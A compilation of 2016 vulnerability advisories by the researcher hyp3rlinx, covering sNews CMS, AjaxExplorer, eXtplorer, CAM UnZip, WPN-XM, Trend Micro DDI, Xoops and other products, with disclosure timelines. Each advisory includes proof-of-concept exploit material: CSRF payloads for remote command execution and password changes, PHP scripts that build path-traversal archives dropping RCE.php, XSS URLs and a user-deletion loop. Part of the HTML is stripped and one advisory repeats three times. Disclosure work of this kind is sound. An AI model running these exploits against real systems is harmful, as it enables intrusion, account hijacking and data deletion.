of security related information or exploits by the author or elsewhere. hyp3rlinx
sNews CMS v1.7.1 Remote Command Execution / CSRF / XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt [+] ISR: APPARITIONSEC Vendor: snewscms.com Product: sNews CMS v1.7.1 Vulnerability Type: === Persistent Remote Command Execution Cross Site Request Forgeries (CSRF) Persistent XSS CVE Reference: == N/A Vulnerability Details: == If an authenticated user happens to stumble upon an attackers webpage or click an infected link they have a chance to get the following prizes, 1) Persistent Remote Code Execution 2) Cross Site Request Forgeries 3) Persistent XSS sNews has feature that allows PHP functions to be inserted for articles by authenticated users under "Edit Article". However, there is no CSRF token/checks to prevent unauthorized HTTP requests to be made on behalf of that user. Furthermore, these commands will get stored in MySQL database in the 'articles' table. So each time that sNews webpage is visited it will execute. e.g. CSRF / RCE Under "Edit Article" Admin area. [func]system:|:"calc.exe"[/func] On line no 3270 of "snews.php" there is no input filtering allowing arbitrary system calls. $returned = call_user_func_array($func[0], explode(',',$func[1])); CSRF / Hijack SNews CMS accounts, the username however must be known in advance, if known then that lucky user wins a changed password!. CSRF / arbitrary file deletion, we can delete arbitrary files in the webroot which we can use to bypass access controls like ".htaccess" file. allowing attackers to read/access files from those affected directories. On line 3080 "snews.php" direct usage of untrusted user input into the PHP "unlink" function which deletes any files the attacker wants. if (isset($_GET['task']) == 'delete') { $file_to_delete = $_GET['folder'].'/'.$_GET['file']; @unlink($file_to_delete); echo notification(0,'','snews_files'); /// Persistent XSS entry point also exists in same "Edit Article" Admin area, but why bother when we have RCE option. Exploit code(s): === Remote Command Execution pop "calc.exe" POC. http://localhost/snews1.7.1/?action=process=admin_article=2;> document.getElementById('CSRF_RCE_PRIZE').submit() After we make HTTP request for the booby trapped article and KABOOM. http://localhost/snews1.7.1/uncategorized/remote-command-execution/ CSRF - Account Hijack = http://localhost/snews1.7.1/?action=process=changeup;> document.getElementById('CSRF-CHG-PASSWD-PRIZE').submit() CSRF - Arbitrary File Deletion === 1) Create file in htdocs / web root as a test e.g. "DELETEME.php" 2) Visit following URL as authenticated user. http://localhost/snews1.7.1/?action=snews_files=delete=Patches Log=../../../DELETEME.php 3) Files gone! Persistent XSS === http://localhost/snews1.7.1/?action=process=admin_article=2;> document.getElementById('XSS').submit() Disclosure Timeline: = Vendor Notification: No Replies June 19, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Critical CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N Description: Request Method(s):[+] GET / POST Vulnerable Product: [+] snews v1.7.1 === [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. by hyp3rlinx
Oracle Orakill.exe Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt [+] ISR: apparitionsec Vendor: == www.oracle.com Product: === orakill.exe v11.2.0 The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle sessions directly from the DOS command line without requiring any connection to the database. C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h Usage: orakill sid thread where sid = the Oracle instance to target thread = the thread id of the thread to kill The thread id should be retrieved from the spid column of a query such as: select spid, osuser, s.program from v$process p, v$session s where p.addr=s.paddr Vulnerability Type: === Buffer Overflow Reference: == http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html Vulnerability Details: = ToLower() filter being applied to supplied arguments e.g. 'A' \x41 beomes 'a' \x61 etc... may be possible to subvert using encoder technique like "ALPHA3". Also we need to supply a second argument of just 4 bytes to trigger the access violation. orakill.exe <104 bytes>, <4 bytes> Register dump. EAX 4000 ECX 0018FCA8 ASCII "" EDX EBX 61616161 ESP 0018FD10 ASCII "" EBP 61616161 ESI 61616161 EDI 61616161 EIP 61616161 C 0 ES 002B 32bit 0() P 0 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Exploit code(s): import subprocess pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe " payload="A"*100 + "" subprocess.Popen([pgm, payload, " "], shell=False) Disclosure Timeline: Vendor Notification: October 5, 2015 Vendor Fix: April 25, 2016 June 13, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
SimpleSAMLphp Link Injection
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SIMPLESAML-PHP-LINK-INJECTION.txt [+] ISR: apparitionsec Vendor: = simplesamlphp.org Product: == simplesamlphp < 1.14.4 Vulnerability Type: === Link Injection CVE Reference: == N/A Vulnerability Details: = Several scripts part of SimpleSAMLphp display a web page with links obtained from the request parameters. This is supposed to enhance usability, as the users are presented with links they can follow after completing a certain action, like logging out. The following scripts do not check the URLs obtained via the HTTP request before displaying them as the target of links that the user may click on: www/logout.php modules/core/www/no_cookie.php The issue allowed attackers to display links targeting a malicious website inside a trusted site running SimpleSAMLphp, due to the lack of security checks involving the link_href and retryURL HTTP parameters, respectively. The issue was resolved by including a verification of the URLs received in the request against a white list of websites specified in the trusted.url.domains configuration option. References: https://simplesamlphp.org/security/201606-01 Affected versions: All SimpleSAMLphp versions prior to 1.14.4. Impact: A remote attacker could craft a link or pop up webpage pointing to a trusted website running SimpleSAMLphp, including a parameter pointing to a malicious website, to fool the victim into visiting that website by clicking on a link in the page presented by the "trusted" SimpleSAMLphp application. Vulnerable Codes: "no_cookie.php" ... == if (isset($_REQUEST['retryURL'])) { $retryURL = (string)$_REQUEST['retryURL']; $retryURL = \SimpleSAML\Utils\HTTP::normalizeURL($retryURL); } else { $retryURL = NULL; } $globalConfig = SimpleSAML_Configuration::getInstance(); $t = new SimpleSAML_XHTML_Template($globalConfig, 'core:no_cookie.tpl.php'); $t->data['retryURL'] = $retryURL; $t->show(); "logout.php" ... if (array_key_exists('link_href', $_REQUEST)) { $link = (string) $_REQUEST['link_href']; $link = \SimpleSAML\Utils\HTTP::normalizeURL($link); } else { $link = 'index.php'; } if (array_key_exists('link_text', $_REQUEST)) { $text = $_REQUEST['link_text']; } else { $text = '{logout:default_link_text}'; } $t = new SimpleSAML_XHTML_Template($config, 'logout.php'); $t->data['link'] = $link; $t->data['text'] = $text; $t->show(); Exploit code(s): === 1) https://victim-server/simplesaml/module.php/core/no_cookie.php?retryURL=https://attacker-server 2) https://victim-server/simplesaml/logout.php?link_href=http://attacker-server/Evil.php_text=PLEASE%20DOWNLOAD%20THIS%20IMPORTANT%20UPDATE Disclosure Timeline: === Vendor Notification: May 31, 2016 June 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
AjaxExplorer v1.10.3.2 Remote CMD Execution / CSRF / Persistent XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt [+] ISR: apparitionsec Vendor: == sourceforge.net smsid download linx: sourceforge.net/projects/ajax-explorer/files/ Product: === AjaxExplorer v1.10.3.2 Manage server files through simple windows like interface. Vulnerability Type: === Remote Command Execution CSRF Persistent XSS CVE Reference: == N/A Vulnerability Details: = AjaxExplorer has command terminal feature where you can move, copy, delete files etc... also lets a user save commands in a flat file named "terminal" under their user profile "/ae.user/owner/myprofile". e.g. copy [FILEPATH + FILENAME] [FILEPATH] create [FILEPATH + FILENAME] Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the application by first creating an .htaccess file with an "allow from all" directive to bypass access restrictions, next create arbitrary PHP files for remote command execution purposes. This exploit will require two consecutive HTTP requests, so we need to target an iframe to stay on same page until exploit is completed. Exploit code(s): === 1) first POST request creates .htaccess file so we can bypass directory browsing restrictions. 2) second POST writes our remote command execution file we will then access to execute commands on the victim system. The below P:/ for "strPath" form value is for "Profile" http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; method="post"> document.getElementById('htaccess').submit() http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; method="post"> document.getElementById('RCE').submit() Now we can access and run arbitrary cmds. http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c:\\Windows\\system32\\calc.exe / Here is another way to RCE this application... first create PHP file then edit. http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;> http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;> document.getElementById('CSRF1').submit() document.getElementById('CSRF2').submit() Persistent XSS: We can also write persistent XSS payload to the user profile "terminal" file. http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;> document.getElementById('XSS').submit() Disclosure Timeline: === Vendor Notification: NA June 1, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: 8.0 (High) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
dns_dhcp Web Interface SQL Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt [+] ISR: apparitionsec Vendor: tmcdos / sourceforge Product: == dns_dhcp Web Interface Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory This is a very simple web interface for management of static DHCP leases in DNSmasq and Mikrotik. It generates config files for DNSmasq and uses RouterOS API to manage Mikrotik. Network devices (usually PCs) are separated into subnets by department and use triplets (hostname, MAC address, IP address) for identification. Information is stored in MySQL. Vulnerability Type: === SQL Injection CVE Reference: == N/A Vulnerability Details: = The 'net' HTTP form POST parameter to dns.php script is not checked/santized and is used directly in MySQL query allowing attacker to easily exfiltrate any data from the backend database by using SQL Injection exploits. 1) On line 239 of dns.php $b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b); 2) dns.php line 187 the a_select function where 2nd argument $_REQUEST['net'] is passed to an concatenated to query ($clause) and executed on line 194 mysql_query($query). function a_select($tbl,$clause,$field='',$where='') { if ($clause==0) return ''; if($field=='') $field=$tbl; $query = "SELECT $field FROM $tbl WHERE "; if($where=='') $query.='ID='.$clause; else $query.=$where; $res = mysql_query($query) or trigger_error($query.''.mysql_error(),E_USER_ERROR); if(mysql_num_rows($res)>0) return mysql_result($res,0,0); else return ''; } Exploit code(s): === Run from CL... Disclosure Timeline: === Vendor Notification: NA May 14, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: == Request Method(s):[+] POST Vulnerable Product: [+] dns_dhcp Web Interface Vulnerable Parameter(s): [+] 'net' = [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
eXtplorer v2.1.9 Archive Path Traversal
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt [+] ISR: apparitionsec Vendor: == extplorer.net Product: == eXtplorer v2.1.9 eXtplorer is a PHP and Javascript-based File Manager, it allows to browse directories, edit, copy, move, delete, search, upload and download files, create & extract archives, create new files and directories, change file permissions (chmod) and more. It is often used as FTP extension for popular applications like Joomla. Vulnerability Type: == Archive Path Traversal CVE Reference: == CVE-2016-4313 Vulnerability Details: = eXtplorer unzip/extract feature allows for path traversal as decompressed files can be placed outside of the intended target directory, if the archive content contains "../" characters. This can result in files like ".htaccess" being overwritten or RCE / back door exploits. Tested on Windows Reproduction steps: == 1) Generate an archive using below PHP script 2) Upload it to eXtplorer and then extract it 3) Check directory for the default 'RCE.php' file or use CL switch to overwrite files like .htaccess Exploit code(s): === Run below PHP script from CL... [evil-archive.php] , , ";exit();} $zipname=$argv[1]; $exploit_file="RCE.php"; $cmd=''; if(!empty($argv[2])&_numeric($argv[2])){ $depth=$argv[2]; }else{ echo "Second flag must be numeric!, you supplied '$argv[2]'"; exit(); } if(strtolower($argv[3])!="y"){ if(!empty($argv[3])){ $exploit_file=$argv[3]; } if(!empty($argv[4])){ $cmd=$argv[4]; }else{ echo "Usage: enter a payload for file $exploit_file wrapped in double quotes"; exit(); } } $zip = new ZipArchive(); $res = $zip->open("$zipname.zip", ZipArchive::CREATE); $zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd); $zip->close(); echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n"; echo " by hyp3rlinx ==="; ?> /// [Script examples] Use default RCE.php by passing "y" flag creating DOOM.zip with path depth of 2 levels c:\>php evil-archive.php DOOM 2 Y Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite one on the system. c:\>php evil-archive.php DOOM 4 .htaccess "allow from all" Disclosure Timeline: === Vendor Notification: No reply May 14, 2016 : Public Disclosure Exploitation Method: == Local Severity Level: Medium 6.3 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. hyp3rlinx
CAM UnZip v5.1 Archive Directory Traversal
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt Vendor: = www.camunzip.com Product: == CAM UnZip v5.1 Vulnerability Type: == Archive Path Traversal CVE Reference: == N/A Vulnerability Details: = CAM UnZip fails to check that the paths of the files in the archive do not engage in path traversal when uncompressing the archive files. specially crafted files in the archive containing '..\' in file name can overwrite files on the filesystem by backtracking or allow attackers to place malicious files on system outside of the target unzip directory which may lead to remote command execution exploits etc... Tested successfully Windows 7 Exploit code(s): === malicious archive script... ";exit();} $file_name=$argv[1]; $zip = new ZipArchive(); $res = $zip->open("$file_name.zip", ZipArchive::CREATE); $zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", ''); $zip->close(); echo "Malicious archive created...\r\n"; echo "= hyp3rlinx "; ?> / Result: Creating Folder: C:\Test\BOZO Extracting Files From: C:\Test\BOZO.zip Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28 1 file was Extracted. C:\RCE.php Exploitation Technique: === Local Severity Level: Medium [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt Vendor: === wpn-xm.org Product: == WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: CSRF - MySQL / PHP.INI Hijacking CVE Reference: == N/A Vulnerability Details: = WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote attackers to compromise an authenticated user if they visit a malicious webpage or click an attacker supplied link. Attackers can modify the 'PHP.INI' file to change arbitrary PHPs settings like enable 'allow_url_include' or changing the default MySQL username & password settings etc... Exploit code(s): === 1) Hijack MySQL Account Default Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-Username').submit() http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-PWD').submit() 2) Hijack PHP.INI Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-PHP-INI').submit() Disclosure Timeline: = Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt Vendor: === wpn-xm.org Product: == WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: CSRF - MySQL / PHP.INI Hijacking CVE Reference: == N/A Vulnerability Details: = WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote attackers to compromise an authenticated user if they visit a malicious webpage or click an attacker supplied link. Attackers can modify the 'PHP.INI' file to change arbitrary PHPs settings like enable 'allow_url_include' or changing the default MySQL username & password settings etc... Exploit code(s): === 1) Hijack MySQL Account Default Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-Username').submit() http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-PWD').submit() 2) Hijack PHP.INI Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-PHP-INI').submit() Disclosure Timeline: = Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
CSRF - MySQL / PHP.INI Hijacking
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt Vendor: === wpn-xm.org Product: == WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: CSRF - MySQL / PHP.INI Hijacking CVE Reference: == N/A Vulnerability Details: = WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote attackers to compromise an authenticated user if they visit a malicious webpage or click an attacker supplied link. Attackers can modify the 'PHP.INI' file to change arbitrary PHPs settings like enable 'allow_url_include' or changing the default MySQL username & password settings etc... Exploit code(s): === 1) Hijack MySQL Account Default Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-Username').submit() http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-PWD').submit() 2) Hijack PHP.INI Settings http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-PHP-INI').submit() Disclosure Timeline: = Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
WPN-XM Serverstack v0.8.6 XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-XSS.txt Vendor: === wpn-xm.org Product: WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: = Cross Site Scripting - XSS CVE Reference: == N/A Vulnerability Details: = WPN-XMs webinterface has cross site scripting security issues allowing remote attackers to execute client side code in the security context of the targeted domain undermining the trust between server & client. XSS attacks can result in data theft, session hijacking etc. Exploit code(s): === XSS 1 http://localhost/tools/webinterface/index.php?page=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 2 http://localhost/tools/webinterface/index.php?action=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 3 http://localhost/tools/webinterface/index.php?page=config=showtab=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E Disclosure Timeline: = Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Low = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
TrendMicro DDI Cross Site Request Forgerys
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt Vendor: www.trendmicro.com Product: = Trend Micro Deep Discovery Inspector V3.8, 3.7 Deep Discovery Inspector is a network appliance that gives you 360-degree network monitoring of all traffic to detect all aspects of a targeted attack. Vulnerability Type: Cross Site Request Forgery - CSRF CVE Reference: == N/A Vulnerability Details: Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an authenticated user visits an malicious webpage attackers will have ability to modify many settings of the Deep Discovery application to that of the attackers choosing. Reference: http://esupport.trendmicro.com/solution/en-US/1113708.aspx Trend Micro DDI is affected by CSRF vulnerabilities. These affect the following console features: Deny List Notifications Detection Rules Threat Detections Email Settings Network Blacklisting/Whitelisting Time Accounts Power Off / Restart DETAILS The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are affected: 3.8 English 3.8 Japanese 3.7 English 3.7 Japanese 3.7 Simplified Chinese Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue. Exploit code(s): === 1) Shut down all threat scans and malicious file submissions under: Administration /Monitoring / Scanning / Threat Detections https://localhost/php/scan_options.php; method="post"> document.getElementById('CSRF-ThreatScans').submit() 2) Whitelist C server menu location: Detections / C Callback Addresses https://localhost/php/blacklist_whitelist_query.php; method="post"> document.getElementById('CSRF-Whitelist').submit() 3) Turn off or change email notifications https://localhost/cgi-bin/mailSettings_set.cgi; method="post"> document.getElementById('CSRF-Notifications').submit() 4) Change system settings ( x.x.x.x = whatever IP we want ) https://localhost/cgi-bin/admin_ip.cgi; method="post"> document.getElementById('PWNED').submit() Disclosure Timeline: === Vendor Notification: November 23, 2015 March 25, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: Request Method(s):[+] POST Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8 [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Xoops 2.5.7.2 CSRF - Arbitrary User Deletions
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt Vendor: = xoops.org Product: Xoops 2.5.7.2 Vulnerability Type: === CSRF - Arbitrary User Deletions Vulnerability Details: = Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL users from the Xoops database. References: http://xoops.org/modules/news/article.php?storyid=6757 Exploit Codes: = Following CSRF attack delete all users from database, following POC code will sequentially delete 100 users from the Xoops application. var c=-1 var amttodelete=100 var id=document.getElementById("ids") var frm=document.getElementById("CSRF") function doit(){ c++ arguments[1].value=c arguments[0].submit() if(c>=amttodelete){ clearInterval(si) alert("Done!") } } var si=setInterval(doit, 1000, frm, id) Disclosure Date: == Jan 29, 2016: Vendor Notification Vendor confirms and patches Xoops March 17, 2016 : Public Disclosure = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (c) hyp3rlinx. hyp3rlinx
Xoops 2.5.7.2 Directory Traversal Bypass
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt Vendor: = xoops.org Product: Xoops 2.5.7.2 Vulnerability Type: === Directory Traversal Bypass Vulnerability Details: = Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing "..././" instead of "../" References: http://xoops.org/modules/news/article.php?storyid=6757 Exploit Codes: == In Xoops code in 'protector.php' the following check is made for dot dot slash "../" in HTTP requests / if( is_array( $_GET[ $key ] ) ) continue ; if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) { $this->last_error_type = 'DirTraversal' ; $this->message .= "Directory Traversal '$val' found.\n" ; The above Xoops directory traversal check can be defeated by using ..././..././..././..././ you can test the theory by using example below test case by supplying ..././ to GET param. $val=$_GET['c']; if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) { echo "traversal!"; }else{ echo "ok!" . $val; } Disclosure Date: == Feb 2, 2016: Vendor Notification Vendor confirms and patches Xoops March 17, 2016 : Public Disclosure == [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (c) hyp3rlinx. hyp3rlinx
Microsoft PowerPointViewer Code Execution
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-PPT-VIEWER-CODE-EXEC.txt Vendor: === www.microsoft.com Product: Microsoft PowerPoint Viewer version: 12.0.6600.1000 Vulnerability Type: DLL Hijack Arbitrary Code Execution Vulnerability Details: = Microsoft PowerPoint Viewer 'POWERPNT.EXE' will execute arbitrary code if an attacker can place a DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" in users downloads directory. This exploit does NOT rely on any embedded OLE objects or CLSID registered COM objects in the document to execute. 1) create malicious DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" 2) place DLL in users downloads directory via download driveby etc... 3) open an existing .PPT document from the downloads directory e.g. "C:\Users\Downloads\somefile.ppt" then BOM ... Tested on: Windows 7 SP1 x64 Disclosure Timeline: = Vendor Notification: February 23, 2016 vendor replies DLL side loading issue already publicly known. a google search returned following results: 1) examples using embedded OLE objects and MS Word etc 2) old posts 3) examples not referencing "api-ms-win-appmodel-runtime-l1-1-0.dll" DLL February 29, 2016 : Public Disclosure. Severity Level: High Description: vulnerable DLL: "api-ms-win-appmodel-runtime-l1-1-0.dll" Vulnerable Product: Microsoft PowerPoint Viewer 'POWERPNT.EXE' [+] Disclaimer Permission is hereby 